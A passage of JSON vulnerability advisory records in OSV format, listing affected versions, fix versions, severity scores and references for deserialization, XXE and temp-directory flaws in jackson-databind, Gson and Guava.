"2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-vfqx-33qm-g869/GHSA-vfqx-33qm-g869.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36189" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2996" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/33d96c13fe18a2dad01b19ce195548c9acea9da4" }, { "type": "WEB", "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210205-0005" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": 
"https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2021-03-18T23:14:22Z", "nvd_published_at": "2021-01-06T23:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-w3f4-3q6j-rh82", "published": "2020-06-30T20:40:50Z", "modified": "2024-03-11T05:18:22.727055Z", "aliases": [ "CVE-2018-5968" ], "summary": "Deserialization of Untrusted Data in jackson-databind", "details": "FasterXML jackson-databind through 2.8.11 and 2.9.x through 2.9.3 allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 and CVE-2017-17485 deserialization flaws. This is exploitable via two different gadgets that bypass a blacklist.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.1" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c 2.8.11", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-w3f4-3q6j-rh82/GHSA-w3f4-3q6j-rh82.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.4" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-w3f4-3q6j-rh82/GHSA-w3f4-3q6j-rh82.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.7.9.5" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-w3f4-3q6j-rh82/GHSA-w3f4-3q6j-rh82.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-5968" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/1899" }, { "type": "WEB", "url": "https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/454be8bb8c913be18298327a84ca45a280b61605" }, { "type": "WEB", "url": 
"https://github.com/FasterXML/jackson-databind/commit/038b471e2efde2e8f96b4e0be958d3e5a1ff1d0" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/03ea0bec6293d4330b5ad19d1d62aca0e3cb6381" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4114" }, { "type": "WEB", "url": "https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US\u0026docId=emr_na-hpesbhf03902en_us" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20180423-0002" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1525" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0481" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0480" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0479" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0478" } ], "database_specific": { "cwe_ids": [ "CWE-184", "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-30T20:40:31Z", "nvd_published_at": "2018-01-22T04:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-wh8g-3j2c-rqj5", "published": "2021-12-09T19:15:00Z", "modified": "2024-03-15T00:31:15.123603Z", "aliases": [ "CVE-2020-35490" ], "summary": "Serialization gadgets exploit in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.datasources.PerUserPoolDataSource.", "affected": [ { "package": { "name": 
"com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.9.10.8" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.10.7", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.7", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-wh8g-3j2c-rqj5/GHSA-wh8g-3j2c-rqj5.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-35490" }, { "type": "WEB", "url": 
"https://github.com/FasterXML/jackson-databind/issues/2986" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/41b8bdb5ccc1d8edb71acf1c8234da235a24249d" }, { "type": "WEB", "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210122-0005" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2021-04-08T21:06:39Z", "nvd_published_at": "2020-12-17T19:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-x2w5-5m2g-7h5m", "published": "2019-01-04T19:09:46Z", "modified": "2024-03-12T05:18:06.737632Z", "aliases": [ "CVE-2018-14720" ], "summary": "XML External Entity Reference (XXE) in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.7 might allow attackers to conduct external XML entity (XXE) attacks by leveraging failure to block unspecified JDK classes from polymorphic deserialization.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, 
"ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.7" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-x2w5-5m2g-7h5m/GHSA-x2w5-5m2g-7h5m.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.3" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.8.11.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-x2w5-5m2g-7h5m/GHSA-x2w5-5m2g-7h5m.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.9.5" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.9.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-x2w5-5m2g-7h5m/GHSA-x2w5-5m2g-7h5m.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-14720" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2097" }, { "type": "WEB", "url": 
"https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/82b01bfb6787097427ce97cec6a7127e93718bc05d1efd5eaffc228f@%3Cdev.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ba973114605d936be276ee6ce09dfbdbf78aa56f6cdc6e79bfa7b8df@%3Cdev.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/May/68" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190530-0003" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4452" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6a78f88716c3c57aa74ec05764a37ab3874769a347805903b393b286@%3Cdev.lucene.apache.org%3E" }, { 
"type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-x2w5-5m2g-7h5m" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:4037" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3892" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1823" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1822" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1140" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1108" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1107" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1106" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0782" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHBA-2019:0959" } ], "database_specific": { "cwe_ids": [ "CWE-502", "CWE-611" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T22:01:50Z", "nvd_published_at": null, "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4jrv-ppp4-jm57", "published": "2022-05-03T00:00:44Z", "modified": "2025-01-14T10:57:11.550318Z", "aliases": [ "CVE-2022-25647" ], "related": [ "CGA-828p-4xp8-m457" ], "summary": "Deserialization of Untrusted Data in Gson", "details": "The package `com.google.code.gson:gson` before 2.8.9 is vulnerable to Deserialization of Untrusted Data via the `writeReplace()` method in internal classes, which may lead to denial of 
service attacks.", "affected": [ { "package": { "name": "com.google.code.gson:gson", "ecosystem": "Maven", "purl": "pkg:maven/com.google.code.gson/gson" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.8.9" } ] } ], "versions": [ "1.1", "1.4", "1.5", "1.6", "1.7", "1.7.1", "1.7.2", "2.0", "2.1", "2.2", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3", "2.3.1", "2.4", "2.5", "2.6", "2.6.1", "2.6.2", "2.7", "2.8.0", "2.8.1", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-4jrv-ppp4-jm57/GHSA-4jrv-ppp4-jm57.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25647" }, { "type": "WEB", "url": "https://github.com/google/gson/pull/1991" }, { "type": "WEB", "url": "https://github.com/google/gson/pull/1991/commits" }, { "type": "PACKAGE", "url": "https://github.com/google/gson" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/05/msg00015.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/09/msg00009.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220901-0009" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-COMGOOGLECODEGSON-1730327" }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5227" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2022-05-20T20:31:08Z", "nvd_published_at": "2022-05-01T16:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5mg8-w23w-74h3", "published": "2021-03-25T17:04:19Z", "modified": "2025-02-20T05:28:20.657499Z", "aliases": [ "CGA-7rjh-334q-pq8g", 
"CVE-2020-8908" ], "related": [ "CGA-3f7x-7jf4-vmjh", "CGA-4jpf-w26h-cg9j", "CGA-9wv6-wh8w-g624", "CGA-c59f-3389-82hg", "CGA-c5f6-f2ff-f6g9", "CGA-cffm-4mv2-8x2h", "CGA-f85c-8jfc-2g85", "CGA-gpmg-5xqr-j8wx", "CGA-m9rw-cj52-34gw", "CGA-mh7m-jqq7-vcwx", "CGA-v8xq-jj26-jf85", "CGA-vm4c-5phc-7w2r" ], "summary": "Information Disclosure in Guava", "details": "A temp directory creation vulnerability exists in Guava prior to version 32.0.0 allowing an attacker with access to the machine to potentially access data in a temporary directory created by the Guava `com.google.common.io.Files.createTempDir()`. The permissions granted to the directory created default to the standard unix-like /tmp ones, leaving the files open. Maintainers recommend explicitly changing the permissions after the creation of the directory, or removing uses of the vulnerable method.\n", "affected": [ { "package": { "name": "com.google.guava:guava", "ecosystem": "Maven", "purl": "pkg:maven/com.google.guava/guava" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "32.0.0-android" } ] } ], "versions": [ "10.0", "10.0-rc1", "10.0-rc2", "10.0-rc3", "10.0.1", "11.0", "11.0-rc1", "11.0.1", "11.0.2", "12.0", "12.0-rc1", "12.0-rc2", "12.0.1", "13.0", "13.0-rc1", "13.0-rc2", "13.0.1", "14.0", "14.0-rc1", "14.0-rc2", "14.0-rc3", "14.0.1", "15.0", "15.0-rc1", "16.0", "16.0-rc1", "16.0.1", "17.0", "17.0-rc1", "17.0-rc2", "18.0", "18.0-rc1", "18.0-rc2", "19.0", "19.0-rc1", "19.0-rc2", "19.0-rc3", "20.0", "20.0-rc1", "21.0", "21.0-rc1", "21.0-rc2", "22.0", "22.0-android", "22.0-rc1", "22.0-rc1-android", "23.0", "23.0-android", "23.0-rc1", "23.0-rc1-android", "23.1-android", "23.1-jre", "23.2-android", "23.2-jre", "23.3-android", "23.3-jre", "23.4-android", "23.4-jre", "23.5-android", "23.5-jre", "23.6-android", "23.6-jre", "23.6.1-android", "23.6.1-jre", "24.0-android", "24.0-jre", "24.1-android", "24.1-jre", "24.1.1-android", "24.1.1-jre", "25.0-android", "25.0-jre", 
"25.1-android", "25.1-jre", "26.0-android", "26.0-jre", "27.0-android", "27.0-jre", "27.0.1-android", "27.0.1-jre", "27.1-android", "27.1-jre", "28.0-android", "28.0-jre", "28.1-android", "28.1-jre", "28.2-android", "28.2-jre", "29.0-android", "29.0-jre", "30.0-android", "30.0-jre", "30.1-android", "30.1-jre", "30.1.1-android", "30.1.1-jre", "31.0-android", "31.0-jre", "31.0.1-android", "31.0.1-jre", "31.1-android", "31.1-jre", "r03", "r05", "r06", "r07", "r08", "r09" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-5mg8-w23w-74h3/GHSA-5mg8-w23w-74h3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8908" }, { "type": "WEB", "url": "https://github.com/google/guava/issues/4011" }, { "type": "WEB", "url": "https://github.com/google/guava/issues/4011#issuecomment-1578991974" }, { "type": "WEB", "url": "https://github.com/google/guava/commit/feb83a1c8fd2e7670b244d5afd23cba5aca43284" }, { "type": "WEB", "url": "https://github.com/google/guava/commit/fec0dbc4634006a6162cfd4d0d09c962073ddf40" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd5d58088812cf8e677d99b07f73c654014c524c94e7fedbdee047604@%3Ctorque-dev.db.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd5d58088812cf8e677d99b07f73c654014c524c94e7fedbdee047604%40%3Ctorque-dev.db.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd2704306ec729ccac726e50339b8a8f079515cc29ccb77713b16e7c5@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd2704306ec729ccac726e50339b8a8f079515cc29ccb77713b16e7c5%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd01f5ff0164c468ec7abc96ff7646cea3cce6378da2e4aa29c6bcb95@%3Cgithub.arrow.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rd01f5ff0164c468ec7abc96ff7646cea3cce6378da2e4aa29c6bcb95%40%3Cgithub.arrow.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcafc3a637d82bdc9a24036b2ddcad1e519dd0e6f848fcc3d606fd78f@%3Cdev.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcafc3a637d82bdc9a24036b2ddcad1e519dd0e6f848fcc3d606fd78f%40%3Cdev.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc607bc52f3507b8b9c28c6a747c3122f51ac24afe80af2a670785b97@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc607bc52f3507b8b9c28c6a747c3122f51ac24afe80af2a670785b97%40%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc2dbc4633a6eea1fcbce6831876cfa17b73759a98c65326d1896cb1a@%3Ctorque-dev.db.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc2dbc4633a6eea1fcbce6831876cfa17b73759a98c65326d1896cb1a%40%3Ctorque-dev.db.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbc7642b9800249553f13457e46b813bea1aec99d2bc9106510e00ff3@%3Ctorque-dev.db.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbc7642b9800249553f13457e46b813bea1aec99d2bc9106510e00ff3%40%3Ctorque-dev.db.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb8c0f1b7589864396690fe42a91a71dea9412e86eec66dc85bbacaaf@%3Ccommits.cxf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb8c0f1b7589864396690fe42a91a71dea9412e86eec66dc85bbacaaf%40%3Ccommits.cxf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb2364f4cf4d274eab5a7ecfaf64bf575cedf8b0173551997c749d322@%3Cgitbox.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb2364f4cf4d274eab5a7ecfaf64bf575cedf8b0173551997c749d322%40%3Cgitbox.hive.apache.org%3E" }, { "type": 
"WEB", "url": "https://lists.apache.org/thread.html/ra7ab308481ee729f998691e8e3e02e93b1dedfc98f6b1cd3d86923b3@%3Cyarn-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-COMGOOGLEGUAVA-1015415" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220210-0003" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfc27e2727a20a574f39273e0432aa97486a332f9b3068f6ac1346594@%3Cdev.myfaces.apache.org%3E" }, { "type": "WEB", "url": 